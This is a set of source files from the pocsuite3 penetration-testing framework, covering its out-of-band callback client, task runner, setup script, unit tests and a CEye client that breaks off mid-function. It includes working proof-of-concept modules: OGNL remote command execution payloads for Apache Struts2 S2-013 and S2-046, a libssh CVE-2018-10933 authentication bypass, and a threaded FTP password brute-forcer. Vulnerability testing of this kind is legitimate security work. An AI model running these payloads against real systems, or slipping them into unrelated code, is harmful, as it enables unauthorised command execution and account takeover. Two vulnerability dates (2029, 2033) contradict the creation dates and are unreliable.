#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import base64
import json
import random
import time
from base64 import b64encode
from uuid import uuid4

from Cryptodome.Cipher import AES, PKCS1_OAEP
from Cryptodome.Hash import SHA256
from Cryptodome.PublicKey import RSA

from pocsuite3.lib.core.data import conf, logger
from pocsuite3.lib.request import requests
from pocsuite3.lib.utils import random_str


class Interactsh:
    def __init__(self, server='', token=''):
        rsa = RSA.generate(2048)
        self.public_key = rsa.publickey().exportKey()
        self.private_key = rsa.exportKey()

        self.server = server.lstrip('.')
        if 'oob_server' in conf:
            self.server = self.server or conf.oob_server
        self.server = self.server or 'oast.me'

        self.token = token
        if 'oob_token' in conf:
            self.token = self.token or conf.oob_token

        self.headers = {
            "Content-Type": "application/json",
        }
        if self.token:
            self.headers['Authorization'] = self.token
        self.secret = str(uuid4())
        self.encoded = b64encode(self.public_key).decode("utf8")
        guid = uuid4().hex.ljust(33, 'a')
        guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
        self.domain = f'{guid}.{self.server}'
        self.correlation_id = self.domain[:20]

        self.session = requests.session()
        self.session.headers = self.headers
        self.register()

    def register(self):
        data = {
            "public-key": self.encoded,
            "secret-key": self.secret,
            "correlation-id": self.correlation_id
        }
        msg = f"[PLUGIN] Interactsh: Can not initiate {self.server} DNS callback client"
        try:
            res = self.session.post(
                f"http://{self.server}/register", headers=self.headers, json=data, verify=False)
            if res.status_code == 401:
                logger.error("[PLUGIN] Interactsh: auth error")
            elif 'success' not in res.text:
                logger.error(msg)
        except requests.RequestException:
            logger.error(msg)

    def poll(self):
        count = 3
        result = []
        while count:

            try:
                url = f"http://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
                res = self.session.get(url, headers=self.headers, verify=False).json()
                aes_key, data_list = res['aes_key'], res['data']
                for i in data_list:
                    decrypt_data = self.decrypt_data(aes_key, i)
                    result.append(decrypt_data)
                return result
            except Exception:
                count -= 1
                time.sleep(1)
                continue
        return []

    def decrypt_data(self, aes_key, data):
        private_key = RSA.importKey(self.private_key)
        cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256)
        aes_plain_key = cipher.decrypt(base64.b64decode(aes_key))
        decode = base64.b64decode(data)
        bs = AES.block_size
        iv = decode[:bs]
        cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128)
        plain_text = cryptor.decrypt(decode)
        return json.loads(plain_text[16:])

    def build_request(self, length=10, method='http'):
        """
        Generate the url and flag for verification

        :param length: The flag length
        :param method: Request type (dns|https|http), the default is https
        :return: dict { url: Return the request url, flag: Return a random flag }
        Example:
          {
            'url': 'http://hqlbbwmo8u.7735s13s04hp4eu19s4q8n963n73jw6hr.interactsh.com',
            'flag': 'hqlbbwmo8u'
          }

        """
        flag = random_str(length).lower()
        url = f'{flag}.{self.domain}'
        if method.startswith('http'):
            url = f'{method}://{url}'
        return url, flag

    def verify(self, flag, get_result=False):
        """
        Check the flag

        :param flag: The flag to verify
        :param get_result: Whether to return detailed results
        :return: Boolean
        """
        result = self.poll()
        for item in result:
            if flag.lower() in item['full-id'].lower():
                return (True, result) if get_result else True
        return (False, result) if get_result else False


if __name__ == "__main__":
    ISH = Interactsh(token="", server="")
    url, flag = ISH.build_request()
    requests.get(url, timeout=5, verify=False)
    print(ISH.verify(flag, get_result=True))



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-013']
    name = 'Apache Struts2 s2-013'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.14.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-013/S2-014:影响版本Struts 2.0.0-2.3.14.1'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        hash_str = random_str(10)
        command = [
            "echo " + hash_str,
            "cmd.exe /c echo " + hash_str
        ]
        for cmd in command:
            html = self.exp(cmd)

            if hash_str in html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                }

                return result
        return False

    def exp(self, command):
        exec_payload = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D"
        payload = exec_payload.format(cmd=quote(command))
        html = requests.get(self.url + "?x={payload}".format(payload=payload)).text
        return html

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            command = self.get_option("command")
            html = self.exp(command)
            result["VerifyInfo"] = {
                "URL": self.url,
                "HTML": html.replace("\x00", "").encode()
            }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""

import os
import socket

import paramiko

from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE


class DemoPOC(POCBase):
    vulID = '97614'
    version = '3'
    author = ['seebug']
    vulDate = '2018-10-18'
    createDate = '2018-10-17'
    updateDate = '2018-10-18'
    references = ['https://www.seebug.org/vuldb/ssvid-97614']
    name = 'libssh CVE-2018-10933 身份验证绕过漏洞'
    appPowerLink = ' https://www.libssh.org'
    appName = 'libssh'
    appVersion = '>=0.6'
    vulType = VUL_TYPE.LOGIN_BYPASS
    desc = '''libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可以进行一些恶意操作。'''
    samples = ['']
    install_requires = ['paramiko']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    protocol = POC_CATEGORY.PROTOCOL.SSH

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 22

        if password_auth_bypass_test(host, port):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Target'] = '{0}:{1}'.format(host, port)
            return self.parse_attack(result)

        if fake_key_bypass_test(host, port):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['Target'] = '{0}:{1}'.format(host, port)

        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


def password_auth_bypass_test(hostname, port):
    bufsize = 2048
    command = 'whoami'
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)
        cmd_out = stdout.read().decode() + stderr.read().decode()
        print(cmd_out)
        return True if 'root' in cmd_out else False

    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False


def auth_accept(*args, **kwargs):
    new_auth_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_SUCCESS]
    return new_auth_accept(*args, **kwargs)


def fake_key_bypass_test(hostname, port, username='root', keyfile=None, command='whoami'):
    try:
        if keyfile is None:
            keyfile = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa')

        paramiko.auth_handler.AuthHandler._server_handler_table.update(
            {paramiko.common.MSG_USERAUTH_REQUEST: auth_accept})

        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile)

        stdin, stdout, stderr = client.exec_command(command)
        cmd_output = stdout.read()
        client.close()
        return True if cmd_output == 'root' else False

    except FileNotFoundError:
        logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.")
        return False
    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False


register_poc(DemoPOC)



from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.settings import IS_WIN
from pocsuite3.lib.core.settings import PLATFORM

_readline = None

try:
    from readline import *
    import readline as _readline
except ImportError:
    try:
        from pyreadline import *
        import pyreadline as _readline
    except ImportError:
        # raise PocsuiteSystemException("Import pyreadline faild,try pip3 install pyreadline")
        pass

if IS_WIN and _readline:
    try:
        _outputfile = _readline.GetOutputFile()
    except AttributeError:
        debugMsg = "Failed GetOutputFile when using platform's "
        debugMsg += "readline library"
        logger.debug(debugMsg)

        _readline = None

# Test to see if libedit is being used instead of GNU readline.
# Thanks to Boyd Waters for this patch.
uses_libedit = False

if PLATFORM == 'mac' and _readline:
    import commands

    (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__)

    if status == 0 and len(result) > 0:
        # We are bound to libedit - new in Leopard
        _readline.parse_and_bind("bind ^I rl_complete")

        debug_msg = "Leopard libedit detected when using platform's "
        debug_msg += "readline library"
        logger.debug(debug_msg)

        uses_libedit = True

# the clear_history() function was only introduced in Python 2.4 and is
# actually optional in the readline API, so we must explicitly check for its
# existence.  Some known platforms actually don't have it.  This thread:
# http://mail.python.org/pipermail/python-dev/2003-August/037845.html
# has the original discussion.
if _readline:
    try:
        _readline.clear_history()
    except AttributeError:
        def clear_history():
            pass

        _readline.clear_history = clear_history



#!/usr/bin/env python
import os
try:
    from setuptools import setup, find_packages
except ImportError:
    from distutils.core import setup

    def find_packages(where='.'):
        # os.walk -> list[(dirname, list[subdirs], list[files])]
        return [folder.replace(os.sep, ".").strip(".")
                for (folder, _, files) in os.walk(where)
                if "__init__.py" in files]


long_description = (
    'Pocsuite3 is an open-sourced remote vulnerability testing and proof-of-concept development framework '
    'developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine, many nice '
    'features for the ultimate penetration testers and security researchers.'
)


setup(
    name='pocsuite3',
    version='2.1.0',
    url='https://pocsuite.org',
    description='Open-sourced remote vulnerability testing framework.',
    long_description=long_description,
    keywords='PoC,Exp,Pocsuite',
    author='Knownsec 404 Team',
    author_email='404-team@knownsec.com',
    maintainer='Knownsec 404 Team',
    platforms=['any'],
    license='GPLv2',
    zip_safe=False,
    packages=find_packages(),
    include_package_data=True,
    python_requires='>=3.8',
    entry_points={
        "console_scripts": [
            "pocsuite = pocsuite3.cli:main",
            "poc-console = pocsuite3.console:main"
        ]
    },
    install_requires=[
        "requests >= 2.22.0",
        "requests-toolbelt",
        "PySocks",
        "urllib3",
        "chardet",
        "termcolor",
        "colorama",
        "prettytable",
        "colorlog",
        "scapy",
        "Faker",
        "pycryptodomex",
        "dacite",
        "PyYAML",
        "lxml",
        "docker",
        "packaging"
    ],
    extras_require={
        'complete': [
            'pyOpenSSL',
            'jq',
            'mmh3'
        ],
    }
)



from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-046']
    name = 'Apache Struts2 s2-046'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-046:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        headers = {
            "Connection": "Close",
            "Content-Type": "multipart/form-data; boundary=3b0bfa1f36cb6157a128f0549a4a7446",
        }
        # html = requests.post(self.url, files=files, headers=headers).text
        data = b'''--3b0bfa1f36cb6157a128f0549a4a7446
Content-Disposition: form-data; name="test"; filename="%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=utf-8')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0\0b"
Content-Type: text/plain

x
--3b0bfa1f36cb6157a128f0549a4a7446--'''.replace(b'\n', b'\r\n')
        html = requests.post(self.url, data=data, headers=headers).text
        if 'security_check' == html:
            result["VerifyInfo"] = {
                "URL": self.url,
            }
            return result
        return False

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            exec_payload = b"%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('CMD'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\0\0b"
            cmd = self.get_option("command")
            exec_payload = exec_payload.replace(b'CMD', cmd.encode())
            data = b'''--3b0bfa1f36cb6157a128f0549a4a7446
Content-Disposition: form-data; name="test"; filename="FILENAME"

Content-Type: text/plain
    
x
--3b0bfa1f36cb6157a128f0549a4a7446--'''.replace(b'FILENAME', exec_payload).replace(b'\n', b'\r\n')
            headers = {
                "Connection": "Close",
                "Content-Type": "multipart/form-data; boundary=3b0bfa1f36cb6157a128f0549a4a7446",
            }
            html = requests.post(self.url, data=data, headers=headers).text

            if html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "Content": html.replace("\x00", "").encode()
                }
            return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""

import ftplib
import itertools
import queue
import socket

from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads


class DemoPOC(POCBase):
    vulID = '62522'
    version = '3'
    author = ['seebug']
    vulDate = '2013-11-21'
    createDate = '2013-11-21'
    updateDate = '2013-11-21'
    references = ['http://sebug.net/vuldb/ssvid-62522']
    name = 'FTP 弱密码'
    appPowerLink = ''
    appName = 'ftp'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ftp 存在弱密码，导致攻击者可连接进行文件管理进行恶意操作'''
    samples = ['']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.FTP

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 21

        ftp_burst(host, port)
        if not result_queue.empty():
            username, password = result_queue.get()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Username'] = username
            result['VerifyInfo']['Password'] = password
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


task_queue = queue.Queue()
result_queue = queue.Queue()


def get_word_list():
    common_username = ('admin', 'ftp', 'test', 'root', 'guest', 'daemon', 'user')
    with open(paths.WEAK_PASS) as f:
        return itertools.product(common_username, f)


def port_check(host, port=21):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect_ex((host, int(port)))
    if connect == 0:
        return True
    else:
        s.close()
        return False


def anonymous_login(host, port):
    return ftp_login(host, port, anonymous=True)


def ftp_login(host, port, username=None, password=None, anonymous=False):
    ret = False
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, port, timeout=6)
        if anonymous:
            ftp.login()
        else:
            ftp.login(username, password)
        ret = True
        ftp.quit()
    except Exception:
        pass
    return ret


def task_init(host, port):
    for username, password in get_word_list():
        task_queue.put((host, port, username.strip(), password.strip()))


def task_thread():
    while not task_queue.empty():
        host, port, username, password = task_queue.get()
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if ftp_login(host, port, username, password):
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))


def ftp_burst(host, port):
    if not port_check(host, port):
        return

    if anonymous_login(host, port):
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, 'anonymous', '<empty>'))
        result_queue.put(('anonymous', '<empty>'))
        return

    try:
        task_init(host, port)
        run_threads(4, task_thread)
    except Exception:
        pass


register_poc(DemoPOC)



import copy
import time

import requests
from prettytable import PrettyTable
from pocsuite3.lib.core.common import data_to_stdout, mosaic
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.exception import PocsuiteValidationException, PocsuiteSystemException
from pocsuite3.lib.core.poc import Output
from pocsuite3.lib.core.settings import CMD_PARSE_WHITELIST
from pocsuite3.lib.core.threads import run_threads
from pocsuite3.lib.utils import urlparse
from pocsuite3.modules.listener import handle_listener_connection
from pocsuite3.modules.listener.reverse_tcp import handle_listener_connection_for_console


def runtime_check():
    if not kb.registered_pocs:
        msg = "No poc specified, try 'pocsuite -h' or 'pocsuite --help' for more information"
        logger.warn(msg)
        raise PocsuiteSystemException(msg)


def start():
    runtime_check()
    tasks_count = kb.task_queue.qsize()
    info_msg = "pocsusite got a total of {0} tasks".format(tasks_count)
    logger.info(info_msg)
    conf.threads = min(conf.threads, tasks_count)
    logger.debug("pocsuite will open {} threads".format(conf.threads))

    try:
        run_threads(conf.threads, task_run)
        logger.info("Scan completed,ready to print")
    finally:
        task_done()

    if conf.mode == "shell" and not conf.api:
        info_msg = "connect back ip: {0}    port: {1}".format(mosaic(conf.connect_back_host), conf.connect_back_port)
        logger.info(info_msg)
        info_msg = "watting for shell connect to pocsuite"
        logger.info(info_msg)
        if conf.console_mode:
            handle_listener_connection_for_console()
        else:
            handle_listener_connection()


def show_task_result():
    if conf.quiet:
        return

    if not kb.results:
        return

    if conf.mode == "shell":
        return

    fields = ["target-url", "poc-name", "poc-id", "component", "version", "status"]
    if kb.comparison:
        fields.append("source")
        fields.append("honey-pot")
    results_table = PrettyTable(fields)
    results_table.align["target-url"] = "l"
    results_table.padding_width = 1

    total_num, success_num = 0, 0
    for row in kb.results:
        data = [
            row.target,
            row.poc_name,
            row.vul_id,
            row.app_name,
            row.app_version,
            row.status,
        ]
        if kb.comparison:
            source, honey = kb.comparison.getinfo(row.target)
            data.append(source)
            data.append(honey)
        results_table.add_row(data)
        total_num += 1
        if row.status == 'success':
            success_num += 1

    data_to_stdout('\n{0}'.format(results_table.get_string(sortby="status", reversesort=False)))
    data_to_stdout("\nsuccess : {} / {}\n".format(success_num, total_num))


def check_docker_status(target):
    if conf.docker_start:
        info_msg = "wait for docker..."
        logger.info(info_msg)
        while True:
            try:
                resp = requests.get(target)
                if resp.status_code:
                    break
            except Exception:
                pass


def task_run():
    while not kb.task_queue.empty() and kb.thread_continue:
        target, poc_module = kb.task_queue.get()
        if not conf.console_mode:
            poc_module = copy.deepcopy(kb.registered_pocs[poc_module])
        poc_name = poc_module.name
        # check container status
        check_docker_status(target)

        if conf.pcap:
            # start capture flow
            import os
            import logging

            os.environ["MPLBACKEND"] = "Agg"
            logging.getLogger("scapy").setLevel(logging.ERROR)

            from pocsuite3.lib.utils.pcap_sniffer import Sniffer
            from scapy.utils import wrpcap
            sniffer = Sniffer(urlparse(target).hostname)
            if sniffer.use_pcap:
                if not sniffer.is_admin:
                    logger.warn(
                        "Please use administrator privileges, and the poc will continue to execute "
                        "without fetching the packet")
                    conf.pcap = False
                else:
                    sniffer.start()
                    # let scapy start for a while
                    time.sleep(1)
            else:
                logger.warn("No libpcap is detected, and the poc will continue to execute without fetching the packet")
                conf.pcap = False
        info_msg = "running poc:'{0}' target '{1}'".format(
            poc_name,
            mosaic(target)
        )

        if len(kb.targets) > 1:
            info_msg += ", {0} tasks waiting to be executed.".format(kb.task_queue.qsize())

        logger.info(info_msg)

        # hand user define parameters
        if hasattr(poc_module, "_options"):
            for item in kb.cmd_line:
                value = cmd_line_options.get(item, "")
                if item in poc_module.options:
                    poc_module.set_option(item, value)
                    info_msg = "Parameter {0} => {1}".format(item, value)
                    logger.info(info_msg)
            # check must be option
            for opt, v in poc_module.options.items():
                # check conflict in whitelist
                if opt in CMD_PARSE_WHITELIST:
                    info_msg = (
                        "Poc:'{0}' You can't customize this variable '{1}' because it is already taken up "
                        "by the pocsuite.").format(poc_name, opt)
                    logger.error(info_msg)
                    raise SystemExit

                if v.require and v.value == "":
                    info_msg = "Poc:'{poc}' Option '{key}' must be set, please add parameters '--{key}'".format(
                        poc=poc_name, key=opt)
                    logger.error(info_msg)
                    raise SystemExit

        try:
            result = poc_module.execute(target, headers=conf.http_headers, mode=conf.mode, verbose=False)
        except PocsuiteValidationException as ex:
            info_msg = "Poc:'{}' PocsuiteValidationException:{}".format(poc_name, ex)
            logger.error(info_msg)
            result = None

        if not isinstance(result, Output) and not None:
            _result = Output(poc_module)
            if result:
                if isinstance(result, bool):
                    _result.success({})
                elif isinstance(result, str):
                    _result.success({"Info": result})
                elif isinstance(result, dict):
                    _result.success(result)
                else:
                    _result.success({"Info": repr(result)})
            else:
                _result.fail('target is not vulnerable')

            result = _result

        if not result:
            continue

        if not conf.quiet:
            result.show_result()

        result_status = "success" if result.is_success() else "failed"
        if result_status == "success" and kb.comparison:
            kb.comparison.change_success(target, True)

        output = AttribDict(result.to_dict())

        output.update({
            'target': mosaic(target),
            'poc_name': poc_name,
            'created': time.strftime("%Y-%m-%d %X", time.localtime()),
            'status': result_status
        })
        result_plugins_handle(output)
        kb.results.append(output)
        if conf.pcap:
            sniffer.join(20)
            if not sniffer.is_alive():
                filename = urlparse(target).hostname + time.strftime('_%Y_%m_%d_%H%M%S.pcap')
                logger.info(f"pcap data has been saved in: {mosaic(filename)}")
                wrpcap(filename, sniffer.pcap.results)
            else:
                logger.error("Thread terminates timeout. Failed to save pcap")

        # TODO
        # set task delay


def result_plugins_start():
    """
    run result plugins, such as html report
    :return:
    """
    for _, plugin in kb.plugins.results.items():
        plugin.start()


def result_plugins_handle(output):
    """
    run result plugins when execute poc
    :return:
    """
    for _, plugin in kb.plugins.results.items():
        plugin.handle(output)


def result_compare_handle():
    """
    show comparing data from various of search engine
    :return:
    """
    if not kb.comparison:
        return
    kb.comparison.output()


def task_done():
    show_task_result()
    result_plugins_start()
    result_compare_handle()



import hashlib


def cachedmethod(f, cache={}):
    """
    Method with a cached content
    Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
    """

    def _(*args, **kwargs):
        key_string = "|".join(str(_) for _ in (f, args, kwargs)).encode()
        key = int(hashlib.md5(key_string).hexdigest(), 16) & 0x7fffffffffffffff
        if key not in cache:
            cache[key] = f(*args, **kwargs)

        return cache[key]

    return _



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import unittest
from pocsuite3.lib.core.common import parse_target
from pocsuite3.lib.core.common import OrderedSet


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_domain(self):
        result = OrderedSet()
        result.add('example.com')
        self.assertEqual(parse_target('example.com'), result)

    def test_domain_url(self):
        result = OrderedSet()
        result.add('https://example.com/cgi-bin/test.cgi?a=b&c=d')
        self.assertEqual(parse_target('https://example.com/cgi-bin/test.cgi?a=b&c=d'), result)

    def test_domain_url_with_additional_ports(self):
        result = OrderedSet()
        result.add('https://example.com:8080/cgi-bin/test.cgi?a=b&c=d')
        result.add('https://example.com:8443/cgi-bin/test.cgi?a=b&c=d')
        result.add('http://example.com:10000/cgi-bin/test.cgi?a=b&c=d')
        self.assertEqual(parse_target('https://example.com/cgi-bin/test.cgi?a=b&c=d',
                                      [8080, 8443, 'http:10000'], True), result)

    def test_ipv4_url(self):
        result = OrderedSet()
        result.add('172.16.218.1/cgi-bin')
        self.assertEqual(parse_target('172.16.218.1/cgi-bin'), result)

    def test_ipv6_url(self):
        result = OrderedSet()
        result.add('https://[fd12:3456:789a:1::f0]:8443/test')
        self.assertEqual(parse_target('https://[fd12:3456:789a:1::f0]:8443/test'), result)

    def test_ipv4(self):
        result = OrderedSet()
        result.add('192.168.1.1')
        self.assertEqual(parse_target('192.168.1.1'), result)

    def test_ipv4_cidr(self):
        result = OrderedSet()
        result.add('192.168.1.0')
        result.add('192.168.1.1')
        self.assertEqual(parse_target('192.168.1.1/31'), result)

    def test_ipv4_cidr_with_host_32(self):
        result = OrderedSet()
        result.add('192.168.1.1')
        self.assertEqual(parse_target('192.168.1.1/32'), result)

    def test_ipv4_with_additional_ports(self):
        result = OrderedSet()
        result.add('172.16.218.0:8080')
        result.add('172.16.218.0:8443')
        result.add('https://172.16.218.0:10000')
        result.add('172.16.218.1:8080')
        result.add('172.16.218.1:8443')
        result.add('172.16.218.1:8443')
        result.add('https://172.16.218.1:10000')
        self.assertEqual(parse_target('172.16.218.1/31', [8080, 8443, 'https:10000'], True), result)

    def test_ipv6(self):
        result = OrderedSet()
        result.add('fd12:3456:789a:1::1')
        self.assertEqual(parse_target('fd12:3456:789a:1::1'), result)

    def test_ipv6_cidr(self):
        result = OrderedSet()
        result.add('fd12:3456:789a:1::1')
        result.add('fd12:3456:789a:1::2')
        result.add('fd12:3456:789a:1::3')
        self.assertEqual(parse_target('fd12:3456:789a:1::/126'), result)

    def test_ipv6_cidr_with_host_128(self):
        result = OrderedSet()
        result.add('fd12:3456:789a:1::')
        self.assertEqual(parse_target('fd12:3456:789a:1::/128'), result)

    def test_ipv6_with_additional_ports(self):
        result = OrderedSet()
        result.add('fd12:3456:789a:1::1')
        result.add('[fd12:3456:789a:1::1]:8080')
        result.add('[fd12:3456:789a:1::1]:8443')
        result.add('https://[fd12:3456:789a:1::1]:10000')
        result.add('fd12:3456:789a:1::2')
        result.add('[fd12:3456:789a:1::2]:8080')
        result.add('[fd12:3456:789a:1::2]:8443')
        result.add('https://[fd12:3456:789a:1::2]:10000')
        result.add('fd12:3456:789a:1::3')
        result.add('[fd12:3456:789a:1::3]:8080')
        result.add('[fd12:3456:789a:1::3]:8443')
        result.add('https://[fd12:3456:789a:1::3]:10000')
        self.assertEqual(parse_target('fd12:3456:789a:1::/126', [8080, 8443, 'https:10000']), result)

    def test_localhost(self):
        result = OrderedSet()
        result.add('localhost')
        self.assertEqual(parse_target('localhost'), result)

    def test_random_str(self):
        result = OrderedSet()
        result.add('!@#$%^&*()_-+=:::::<>""{}[]:::8080')
        self.assertEqual(parse_target('!@#$%^&*()_-+=:::::<>""{}[]:::8080'), result)



import getpass
import json
import os
import time
import re
from configparser import ConfigParser

from pocsuite3.api import conf
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.request import requests
from pocsuite3.lib.utils import get_middle_text, random_str


class CEye(object):
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
        self.url = 'http://api.ceye.io/v1'
        self.identify = ''
        self.headers = {'User-Agent': 'curl/7.80.0'}
        self.token = token
        if 'ceye_token' in conf:
            self.token = self.token or conf.ceye_token
        self.conf_path = conf_path

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.token or self.parser.get('CEye', 'token')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token:
            try:
                self.headers['Authorization'] = self.token
                resp = requests.get(f'{self.url}/identify', headers=self.headers)
